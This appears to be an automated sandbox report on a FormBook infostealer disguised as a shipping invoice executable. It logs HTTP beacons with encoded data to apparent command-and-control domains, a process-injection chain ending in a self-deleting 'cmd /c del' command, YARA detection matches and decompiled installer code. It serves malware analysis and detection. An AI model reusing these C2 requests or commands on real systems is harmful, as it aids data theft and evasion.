                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.44977095.215.210.1080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:09:00.427666903 CET1413OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1
                                                                                                                                  Host: www.wastie.club
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:09:00.543806076 CET1414INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:00 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/7.3.19
                                                                                                                                  Content-Length: 203
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 71 67 66 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.44977134.102.136.18080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:09:05.652915001 CET1415OUTGET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.gettingthehelloutofca.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:09:05.767719984 CET1415INHTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:05 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fb7c734-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.449772165.227.229.1580C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:09:11.027050972 CET1417OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1
                                                                                                                                  Host: www.caelaabadie.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:09:13.298913956 CET1417INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:11 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  X-Redirect-By: WordPress
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Location: http://caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Nov 26, 2020 15:09:13.315665007 CET1417INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  Analysis Process: Shipping INVOICE-BL Shipment..exe PID: 2792 Parent PID: 5812

                                                                                                                                  General

                                                                                                                                  Start time:15:07:08
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:438107 bytes
                                                                                                                                  MD5 hash:579BA39B6A146080EF6481591440E445
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: rundll32.exe PID: 1748 Parent PID: 2792

                                                                                                                                  General

                                                                                                                                  Start time:15:07:09
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe Prehnite,Lychnises
                                                                                                                                  Imagebase:0xd30000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: cmd.exe PID: 6360 Parent PID: 1748

                                                                                                                                  General

                                                                                                                                  Start time:15:07:16
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe
                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 6360

                                                                                                                                  General

                                                                                                                                  Start time:15:07:30
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:
                                                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: netsh.exe PID: 4768 Parent PID: 3424

                                                                                                                                  General

                                                                                                                                  Start time:15:07:44
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:82944 bytes
                                                                                                                                  MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: cmd.exe PID: 6908 Parent PID: 4768

                                                                                                                                  General

                                                                                                                                  Start time:15:07:48
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:/c del 'C:\Windows\SysWOW64\cmd.exe'
                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: conhost.exe PID: 5732 Parent PID: 6908

                                                                                                                                  General

                                                                                                                                  Start time:15:07:49
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis

                                                                                                                                  Reset < >

                                                                                                                                    Analysis Process: Shipping INVOICE-BL Shipment..exe PID: 2792 Parent PID: 5812 Shipping INVOICE-BL Shipment..exeCOMMON

                                                                                                                                    Executed Functions

                                                                                                                                    Function 004033A9, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				intOrPtr _t188;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t118 = E004064FE(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E00406490(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E004064FE(0xa);
				 *0x42f424 = E004064FE(8);
				_t47 = E004064FE(6);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429858, 0, _t163 + 0x38, 0x160, 0); // executed
				E00406166("Unbound Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t159 = "\"C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe\" ";
				E00406166(_t159, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t159;
				if("\"C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe\" " == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405B29(_t53,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t55;
				while(1) {
					_t121 =  *_t55;
					_t171 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405B29(_t55,  *(_t163 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00406166(0x435400,  &(_t55[2]));
										L30:
										_t156 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156); // executed
										_t59 = E00403378(_t171);
										_t172 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402E14(_t174,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t184 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t62 =  *0x42f4ec;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E004064FE(4);
													__eflags = _t66;
													if(_t66 == 0) {
														L65:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405882( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t163 + 0x18) = E00403983( *0x42f4ec);
												goto L43;
											}
											_t152 = E00405B29(_t159, 0);
											if(_t152 < _t159) {
												L39:
												_t181 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E004057ED(_t184);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\jones\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\jones\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E004057D0();
														} else {
															E00405753();
														}
														SetCurrentDirectoryA(_t156);
														_t188 =  *0x435400; // 0x0
														if(_t188 == 0) {
															E00406166(0x435400, _t161);
														}
														E00406166(0x430000,  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														 *0x430400 = "A";
														do {
															E00406188(0, 0x429458, _t156, 0x429458,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429458);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe", 0x429458, 1) != 0) {
																E00405F45(_t136, 0x429458, 0);
																E00406188(0, 0x429458, _t156, 0x429458,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t93 = E00405805(0x429458);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00405F45(_t136, _t156, 0);
													}
													goto L43;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E00405BEC(_t181, _t152 + 4) == 0) {
													goto L43;
												}
												E00406166(0x435400, _t153);
												E00406166("C:\\Users\\jones\\AppData\\Local\\Temp", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L42;
											}
											_t109 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E00403378(_t172);
										_t173 = _t112;
										if(_t112 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E00403378(_t173);
										_t174 = _t117;
										if(_t117 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t140 = _t55[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L23:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t141 = _t55[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                                                                                    0x004033b9
                                                                                                                                    0x004033bd
                                                                                                                                    0x004033c5
                                                                                                                                    0x004033c9
                                                                                                                                    0x004033ce
                                                                                                                                    0x004033da
                                                                                                                                    0x004033e3
                                                                                                                                    0x004033e8
                                                                                                                                    0x004033eb
                                                                                                                                    0x004033f2
                                                                                                                                    0x004033f9
                                                                                                                                    0x004033f9
                                                                                                                                    0x004033f2
                                                                                                                                    0x004033fb
                                                                                                                                    0x00403400
                                                                                                                                    0x00403401
                                                                                                                                    0x0040340d
                                                                                                                                    0x00403411
                                                                                                                                    0x00403417
                                                                                                                                    0x00403425
                                                                                                                                    0x0040342a
                                                                                                                                    0x00403431
                                                                                                                                    0x00403435
                                                                                                                                    0x00403439
                                                                                                                                    0x0040343b
                                                                                                                                    0x0040343b
                                                                                                                                    0x00403439
                                                                                                                                    0x00403443
                                                                                                                                    0x0040344a
                                                                                                                                    0x00403450
                                                                                                                                    0x00403466
                                                                                                                                    0x00403476
                                                                                                                                    0x0040347b
                                                                                                                                    0x00403481
                                                                                                                                    0x00403488
                                                                                                                                    0x00403494
                                                                                                                                    0x0040349e
                                                                                                                                    0x004034a0
                                                                                                                                    0x004034a2
                                                                                                                                    0x004034a7
                                                                                                                                    0x004034a7
                                                                                                                                    0x004034b7
                                                                                                                                    0x004034bd
                                                                                                                                    0x00403586
                                                                                                                                    0x00403586
                                                                                                                                    0x00403588
                                                                                                                                    0x0040358a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004034c6
                                                                                                                                    0x004034c9
                                                                                                                                    0x004034d1
                                                                                                                                    0x004034d1
                                                                                                                                    0x004034d4
                                                                                                                                    0x004034d9
                                                                                                                                    0x004034db
                                                                                                                                    0x004034db
                                                                                                                                    0x004034dc
                                                                                                                                    0x004034dc
                                                                                                                                    0x004034e1
                                                                                                                                    0x004034e4
                                                                                                                                    0x00403576
                                                                                                                                    0x0040357b
                                                                                                                                    0x00403580
                                                                                                                                    0x00403583
                                                                                                                                    0x00403585
                                                                                                                                    0x00403585
                                                                                                                                    0x00403585
                                                                                                                                    0x00000000
                                                                                                                                    0x004034ea
                                                                                                                                    0x004034ea
                                                                                                                                    0x004034eb
                                                                                                                                    0x004034ee
                                                                                                                                    0x00403506
                                                                                                                                    0x00403531
                                                                                                                                    0x00403533
                                                                                                                                    0x00403546
                                                                                                                                    0x00403571
                                                                                                                                    0x00403574
                                                                                                                                    0x00403592
                                                                                                                                    0x00403595
                                                                                                                                    0x0040359e
                                                                                                                                    0x004035a3
                                                                                                                                    0x004035a9
                                                                                                                                    0x004035b4
                                                                                                                                    0x004035b6
                                                                                                                                    0x004035bb
                                                                                                                                    0x004035bd
                                                                                                                                    0x00403615
                                                                                                                                    0x0040361a
                                                                                                                                    0x00403624
                                                                                                                                    0x0040362b
                                                                                                                                    0x0040362f
                                                                                                                                    0x004036c3
                                                                                                                                    0x004036c3
                                                                                                                                    0x004036c8
                                                                                                                                    0x004036ce
                                                                                                                                    0x004036d3
                                                                                                                                    0x004037f7
                                                                                                                                    0x004037fd
                                                                                                                                    0x00403879
                                                                                                                                    0x00403879
                                                                                                                                    0x0040387e
                                                                                                                                    0x00403881
                                                                                                                                    0x00403883
                                                                                                                                    0x00403883
                                                                                                                                    0x0040388b
                                                                                                                                    0x0040388b
                                                                                                                                    0x0040380d
                                                                                                                                    0x00403815
                                                                                                                                    0x00403817
                                                                                                                                    0x00403818
                                                                                                                                    0x00403825
                                                                                                                                    0x00403838
                                                                                                                                    0x00403840
                                                                                                                                    0x00403844
                                                                                                                                    0x00403844
                                                                                                                                    0x0040384c
                                                                                                                                    0x00403851
                                                                                                                                    0x00403858
                                                                                                                                    0x00403866
                                                                                                                                    0x00403868
                                                                                                                                    0x0040386e
                                                                                                                                    0x00403870
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040385a
                                                                                                                                    0x00403860
                                                                                                                                    0x00403862
                                                                                                                                    0x00403864
                                                                                                                                    0x00403872
                                                                                                                                    0x00403874
                                                                                                                                    0x00000000
                                                                                                                                    0x00403874
                                                                                                                                    0x00000000
                                                                                                                                    0x00403864
                                                                                                                                    0x00403858
                                                                                                                                    0x004036e2
                                                                                                                                    0x004036e9
                                                                                                                                    0x004036e9
                                                                                                                                    0x0040363b
                                                                                                                                    0x004036b3
                                                                                                                                    0x004036b3
                                                                                                                                    0x004036bf
                                                                                                                                    0x00000000
                                                                                                                                    0x004036bf
                                                                                                                                    0x00403644
                                                                                                                                    0x00403648
                                                                                                                                    0x0040367e
                                                                                                                                    0x0040367e
                                                                                                                                    0x00403680
                                                                                                                                    0x00403688
                                                                                                                                    0x004036fa
                                                                                                                                    0x004036fc
                                                                                                                                    0x00403703
                                                                                                                                    0x0040370b
                                                                                                                                    0x0040370b
                                                                                                                                    0x00403716
                                                                                                                                    0x0040371b
                                                                                                                                    0x0040372a
                                                                                                                                    0x0040372e
                                                                                                                                    0x0040372f
                                                                                                                                    0x00403738
                                                                                                                                    0x00403731
                                                                                                                                    0x00403731
                                                                                                                                    0x00403731
                                                                                                                                    0x0040373e
                                                                                                                                    0x00403744
